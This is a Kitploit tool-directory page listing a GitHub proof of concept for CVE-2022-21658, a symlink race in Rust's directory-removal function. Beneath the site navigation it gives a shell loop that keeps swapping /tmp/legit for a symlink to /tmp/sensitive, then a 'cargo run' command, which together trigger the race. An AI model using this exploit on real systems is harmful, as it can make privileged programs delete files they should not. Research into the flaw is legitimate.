Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2022-21658 — POC for cve-2022-21658 | Kitploit
Tools/GitHubGitHub/sagittarius-a/cve-2022-21658
Vulnerability AnalysisExploitationPapers & ResearchLearning & EducationBinary Exploitation
GitHubsagittarius-a/cve-2022-21658

cve-2022-21658

POC for cve-2022-21658

View Repository
214 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-21658 poc

Make sure the use the Rust 1.58.0 version.

First run:

root@kitploit:~
while :; do mkdir /tmp/legit; rm -r /tmp/legit; ln -s /tmp/sensitive /tmp/legit; done

Then:

root@kitploit:~
cargo run
Download Tool